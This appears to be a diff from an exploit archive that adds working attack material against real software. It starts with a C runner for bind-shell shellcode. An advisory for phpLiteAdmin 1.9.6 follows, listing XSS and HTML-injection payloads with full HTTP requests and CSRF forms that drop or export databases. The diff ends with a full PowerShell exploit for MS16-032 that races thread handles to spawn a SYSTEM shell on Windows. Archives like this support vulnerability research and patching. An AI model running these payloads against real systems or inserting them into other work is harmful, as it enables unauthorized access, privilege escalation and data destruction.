char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}

767
platforms/php/webapps/39714.txt Executable file
View file

@ -0,0 +1,767 @@
#################################################################################################################################################
# Exploit Title: phpLiteAdmin v1.9.6 - Multiple Vulnerabilities
# Date: 20.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.phpliteadmin.org
# Software Link:
https://bitbucket.org/phpliteadmin/public/downloads/phpLiteAdmin_v1-9-6.zip
# Version: 1.9.6
#################################################################################
Introduction
phpLiteAdmin is a web-based SQLite database admin tool written in PHP with
support for SQLite3 and SQLite2. source = https://www.phpliteadmin.org
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS
XSS details:
#################################################################################
XSS1
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD
Post
PARAMETER
0_defaultoption
PAYLOAD
"><script>alert(1)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined"><script>alert(1)</script>&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
#################################################################################
XSS2
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import
METHOD
Post
PARAMETER
file
PAYLOAD
"><script>alert(2)</script>
Request
POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------1675024292505
Content-Length: 1124
-----------------------------1675024292505
Content-Disposition: form-data; name="import_type"
sql
-----------------------------1675024292505
Content-Disposition: form-data; name="single_table"
testtable
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsterminated"
;
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsenclosed"
"
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsescaped"
\
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_replacenull"
NULL
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldnames"
on
-----------------------------1675024292505
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: text/plain
"><script>alert(2)</script>
-----------------------------1675024292505
Content-Disposition: form-data; name="import"
Import
-----------------------------1675024292505--
#################################################################################
XSS3
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=sql
METHOD
Post
PARAMETER
queryval
PAYLOAD
"><script>alert(3)</script>
Request
POST /phpliteadmin/phpliteadmin.php?view=sql HTTP/1.1
queryval=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&delimiter=%3B&query=Go
#################################################################################
XSS4
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1
METHOD
Post
PARAMETER
select
PAYLOAD
"><script>alert(4)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=view_create&confirm=1 HTTP/1.1
viewname=test&select="><script>alert(4)</script>&createtable=Go
#################################################################################
XSS5
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1
METHOD
Post
PARAMETER
viewname
PAYLOAD
<script>alert(5)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1 HTTP/1.1
viewname=test<script>alert(5)</script>
#################################################################################
XSS6
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable
METHOD
Post
PARAMETER
numRows
PAYLOAD
'><script>alert(6)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=row_view&table=testtable HTTP/1.1
show=Show+%3A+&numRows=30%27%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&startRow=0&viewtype=table
#################################################################################
XSS7
URL
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Cscript%3Ealert%287%29%3C/script%3E&pk=id
METHOD
Get
PARAMETER
action2
PAYLOAD
'><script>alert(7)</script>
#################################################################################
XSS8
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD
Post
PARAMETER
tablename
PAYLOAD
%3cscript%3ealert(8)%3c%2fscript%3e
Request
POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
tablename=testtable%3cscript%3ealert(8)%3c%2fscript%3e&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
#################################################################################
XSS9
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1
METHOD
Post
PARAMETER
oldname
PAYLOAD
<script>alert(9)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1 HTTP/1.1
oldname=testtable<script>alert(9)</script>&newname=test&rename=Rename
#################################################################################
HTML Injection details:
#################################################################################
HTML Injection1
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD
Post
PARAMETER
0_defaultoption
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection2
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import
METHOD
Post
PARAMETER
file
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection3
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=sql
METHOD
Post
PARAMETER
queryval
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection4
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1
METHOD
Post
PARAMETER
select
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection5
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1
METHOD
Post
PARAMETER
viewname
PAYLOAD
<iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection6
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable
METHOD
Post
PARAMETER
numRows
PAYLOAD
'><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection7
URL
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Ciframe%20src=https://www.phpliteadmin.org%3E&pk=id
METHOD
Get
PARAMETER
action2
PAYLOAD
'><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection8
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1
METHOD
Post
PARAMETER
oldname
PAYLOAD
<iframe src=https://www.phpliteadmin.org>
#################################################################################
CSRF details:
#################################################################################
CSRF1
Create Database
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
<input type="text" name="new_dbname" value="db"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>
#################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?database_delete=1"
method="POST">
<input type="text" name="database_delete" value=".\db"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#################################################################################
CSRF3
Execute SQL
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=sql"
method="POST">
<input type="text" name="queryval" value="test"/>
<input type="text" name="delimiter" value=";"/>
<input type="text" name="query" value="go"/>
<input type="submit" value="Execute SQL"/>
</form>
</body>
</html>
#################################################################################
CSRF4
Export DB
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=export"
method="POST">
<input type="text" name="tables[]" value="testtable"/>
<input type="text" name="export_type" value="sql"/>
<input type="text" name="structure" value="on"/>
<input type="text" name="data" value="on"/>
<input type="text" name="transaction" value="on"/>
<input type="text" name="comments" value="on"/>
<input type="text" name="export_csv_fieldsterminated" value=";"/>
<input type="text" name="export_csv_fieldsenclosed" value="""/>
<input type="text" name="export_csv_fieldsescaped" value="\"/>
<input type="text" name="export_csv_replacenull" value="NULL"/>
<input type="text" name="export_csv_fieldnames" value="on"/>
<input type="text" name="filename" value="db_2016-04-20.dump"/>
<input type="text" name="export" value="Export"/>
<input type="submit" value="Export DB"/>
</form>
</body>
</html>
#################################################################################
CSRF5
Download Database
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="GET">
<input type="text" name="download" value=".\db"/>
<input type="submit" value="Download DB"/>
</form>
</body>
</html>
#################################################################################
CSRF6
Import Table
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import
Request
POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------28282942824983
Content-Length: 1410
-----------------------------28282942824983
Content-Disposition: form-data; name="import_type"
sql
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsterminated"
;
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsenclosed"
"
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsescaped"
\
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_replacenull"
NULL
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldnames"
on
-----------------------------28282942824983
Content-Disposition: form-data; name="file";
filename="db_2016-04-20.dump.sql"
Content-Type: text/sql
----
-- phpLiteAdmin database dump (https://bitbucket.org/phpliteadmin/public)
-- phpLiteAdmin version: 1.9.6
-- Exported: 12:50am on April 20, 2016 (BST)
-- database file: .\db
----
BEGIN TRANSACTION;
----
-- Table structure for testtable
----
CREATE TABLE 'testtable' ('id' INTEGER DEFAULT 1 );
----
-- Data dump for testtable, a total of 1 rows
----
INSERT INTO "testtable" ("id") VALUES ('1');
COMMIT;
-----------------------------28282942824983
Content-Disposition: form-data; name="import"
Import
-----------------------------28282942824983--
#################################################################################
CSRF7
Database Vacuum
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=vacuum"
method="POST">
<input type="text" name="vacuum" value="Vacuum"/>
<input type="submit" value="DB Vacuum"/>
</form>
</body>
</html>
#################################################################################
CSRF8
Database Rename
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?view=rename&database_rename=1"
method="POST">
<input type="text" name="oldname" value=".\db1"/>
<input type="text" name="newname" value=".\db"/>
<input type="text" name="rename" value="Rename"/>
<input type="submit" value="DB Rename"/>
</form>
</body>
</html>
#################################################################################
CSRF9
Create Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="text" name="rows" value="1"/>
<input type="text" name="0_field" value="id"/>
<input type="text" name="0_type" value="INTEGER"/>
<input type="text" name="0_defaultoption" value="defined"/>
<input type="text" name="0_defaultvalue" value="1"/>
<input type="submit" value="Create Table"/>
</form>
</body>
</html>
#################################################################################
CSRF10
Insert Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_create&confirm=1"
method="POST">
<input type="text" name="numRows" value="1"/>
<input type="text" name="function_0_id" value=""/>
<input type="text" name="0:id" value="1"/>
<input type="text" name="fields" value="id"/>
<input type="submit" value="Insert Table"/>
</form>
</body>
</html>
#################################################################################
CSRF11
Row Delete
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_delete&confirm=1&pk=%5B
%22%5B1%5D%22%5D" method="POST">
<input type="submit" value="Row Delete"/>
</form>
</body>
</html>
#################################################################################
CSRF12
Search Field
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=table_search&done=1"
method="POST">
<input type="text" name="id:operator" value="="/>
<input type="text" name="id" value="1"/>
<input type="submit" value="Search Field"/>
</form>
</body>
</html>
#################################################################################
CSRF13
Rename Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1"
method="POST">
<input type="text" name="oldname" value="test"/>
<input type="text" name="newname" value="testtable"/>
<input type="text" name="rename" value="Rename"/>
<input type="submit" value="Rename Table"/>
</form>
</body>
</html>
#################################################################################
CSRF14
Empty Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_empty&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="submit" value="Empty Table"/>
</form>
</body>
</html>
#################################################################################
CSRF15
Drop Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_drop&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="submit" value="Drop Table"/>
</form>
</body>
</html>
#################################################################################
CSRF16
Create View
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1"
method="POST">
<input type="text" name="viewname" value="test"/>
<input type="text" name="select" value="select * from testtable;"/>
<input type="text" name="createtable" value="go"/>
<input type="submit" value="Create View"/>
</form>
</body>
</html>
#################################################################################
CSRF17
Drop View
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1"
method="POST">
<input type="text" name="viewname" value="test"/>
<input type="submit" value="Drop View"/>
</form>
</body>
</html>
#################################################################################
CSRF18
Logout
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
<input type="hidden" name="logout" value="Logout"/>
<input type="submit" value="Logout"/>
</form>
</body>
</html>
#################################################################################

372
platforms/windows/local/39719.ps1 Executable file
View file

@ -0,0 +1,372 @@
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
Targets:
* Win7-Win10 & 2k8-2k12 <== 32/64 bit!
* Tested on x32 Win7, x64 Win8, x64 2k12R2
Notes:
* In order for the race condition to succeed the machine must have 2+ CPU
cores. If testing in a VM just make sure to add a core if needed mkay.
* The exploit is pretty reliable, however ~1/6 times it will say it succeeded
but not spawn a shell. Not sure what the issue is but just re-run and profit!
* Want to know more about MS16-032 ==>
https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
.DESCRIPTION
Author: Ruben Boonen (@FuzzySec)
Blog: http://www.fuzzysecurity.com/
License: BSD 3-Clause
Required Dependencies: PowerShell v2+
Optional Dependencies: None
E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736
.EXAMPLE
C:\PS> Invoke-MS16-032
#>
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
public struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct SQOS
{
public int Length;
public int ImpersonationLevel;
public int ContextTrackingMode;
public bool EffectiveOnly;
}
public static class Advapi32
{
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
public static extern bool CreateProcessWithLogonW(
String userName,
String domain,
String password,
int logonFlags,
String applicationName,
String commandLine,
int creationFlags,
int environment,
String currentDirectory,
ref STARTUPINFO startupInfo,
out PROCESS_INFORMATION processInformation);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool SetThreadToken(
ref IntPtr Thread,
IntPtr Token);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenThreadToken(
IntPtr ThreadHandle,
int DesiredAccess,
bool OpenAsSelf,
out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenProcessToken(
IntPtr ProcessHandle,
int DesiredAccess,
ref IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(
IntPtr ExistingTokenHandle,
int SECURITY_IMPERSONATION_LEVEL,
ref IntPtr DuplicateTokenHandle);
}
public static class Kernel32
{
[DllImport("kernel32.dll")]
public static extern uint GetLastError();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr GetCurrentThread();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern int GetThreadId(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern int GetProcessIdOfThread(IntPtr handle);
[DllImport("kernel32.dll",SetLastError=true)]
public static extern int SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll",SetLastError=true)]
public static extern int ResumeThread(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool TerminateProcess(
IntPtr hProcess,
uint uExitCode);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
IntPtr hSourceHandle,
IntPtr hTargetProcessHandle,
ref IntPtr lpTargetHandle,
int dwDesiredAccess,
bool bInheritHandle,
int dwOptions);
}
public static class Ntdll
{
[DllImport("ntdll.dll", SetLastError=true)]
public static extern int NtImpersonateThread(
IntPtr ThreadHandle,
IntPtr ThreadToImpersonate,
ref SQOS SecurityQualityOfService);
}
"@
function Get-ThreadHandle {
# StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO
$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
# ProcessInfo Struct
$ProcessInfo = New-Object PROCESS_INFORMATION
# CreateProcessWithLogonW --> lpCurrentDirectory
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
$CallResult = [Advapi32]::CreateProcessWithLogonW(
"user", "domain", "pass",
0x00000002, "C:\Windows\System32\cmd.exe", "",
0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo)
# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
$lpTargetHandle = [IntPtr]::Zero
$CallResult = [Kernel32]::DuplicateHandle(
$ProcessInfo.hProcess, 0x4,
[Kernel32]::GetCurrentProcess(),
[ref]$lpTargetHandle, 0, $false,
0x00000002)
# Clean up suspended process
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
$lpTargetHandle
}
function Get-SystemToken {
echo "`n[?] Trying thread handle: $Thread"
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
$CallResult = [Kernel32]::SuspendThread($Thread)
if ($CallResult -ne 0) {
echo "[!] $Thread is a bad thread, moving on.."
Return
} echo "[+] Thread suspended"
echo "[>] Wiping current impersonation token"
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
if (!$CallResult) {
echo "[!] SetThreadToken failed, moving on.."
$CallResult = [Kernel32]::ResumeThread($Thread)
echo "[+] Thread resumed!"
Return
}
echo "[>] Building SYSTEM impersonation token"
# SecurityQualityOfService struct
$SQOS = New-Object SQOS
$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
# Undocumented API's, I like your style Microsoft ;)
$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
if ($CallResult -ne 0) {
echo "[!] NtImpersonateThread failed, moving on.."
$CallResult = [Kernel32]::ResumeThread($Thread)
echo "[+] Thread resumed!"
Return
}
$script:SysTokenHandle = [IntPtr]::Zero
# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
if (!$CallResult) {
echo "[!] OpenThreadToken failed, moving on.."
$CallResult = [Kernel32]::ResumeThread($Thread)
echo "[+] Thread resumed!"
Return
}
echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
echo "[+] Resuming thread.."
$CallResult = [Kernel32]::ResumeThread($Thread)
}
# main() <--- ;)
$ms16032 = @"
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
"@
$ms16032
# Check logical processor count, race condition requires 2+
echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
if ($([System.Environment]::ProcessorCount) -lt 2) {
echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
Return
}
# Create array for Threads & TID's
$ThreadArray = @()
$TidArray = @()
echo "[>] Duplicating CreateProcessWithLogonW handles.."
# Loop Get-ThreadHandle and collect thread handles with a valid TID
for ($i=0; $i -lt 500; $i++) {
$hThread = Get-ThreadHandle
$hThreadID = [Kernel32]::GetThreadId($hThread)
# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
if ($TidArray -notcontains $hThreadID) {
$TidArray += $hThreadID
if ($hThread -ne 0) {
$ThreadArray += $hThread # This is what we need!
}
}
}
if ($($ThreadArray.length) -eq 0) {
echo "[!] No valid thread handles were captured, exiting!"
Return
} else {
echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
echo "`n[?] Thread handle list:"
$ThreadArray
}
echo "`n[*] Sniffing out privileged impersonation token.."
foreach ($Thread in $ThreadArray){
# Get handle to SYSTEM access token
Get-SystemToken
echo "`n[*] Sniffing out SYSTEM shell.."
echo "`n[>] Duplicating SYSTEM token"
$hDuplicateTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
# Simple PS runspace definition
echo "[>] Starting token race"
$Runspace = [runspacefactory]::CreateRunspace()
$StartTokenRace = [powershell]::Create()
$StartTokenRace.runspace = $Runspace
$Runspace.Open()
[void]$StartTokenRace.AddScript({
Param ($Thread, $hDuplicateTokenHandle)
while ($true) {
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
}
}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
$AscObj = $StartTokenRace.BeginInvoke()
echo "[>] Starting process race"
# Adding a timeout (10 seconds) here to safeguard from edge-cases
$SafeGuard = [diagnostics.stopwatch]::StartNew()
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
# StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
# ProcessInfo Struct
$ProcessInfo = New-Object PROCESS_INFORMATION
# CreateProcessWithLogonW --> lpCurrentDirectory
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
$CallResult = [Advapi32]::CreateProcessWithLogonW(
"user", "domain", "pass",
0x00000002, "C:\Windows\System32\cmd.exe", "",
0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo)
$hTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
# If we can't open the process token it's a SYSTEM shell!
if (!$CallResult) {
echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
$StartTokenRace.Stop()
$SafeGuard.Stop()
Return
}
# Clean up suspended process
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
}
# Kill runspace & stopwatch if edge-case
$StartTokenRace.Stop()
$SafeGuard.Stop()
}
}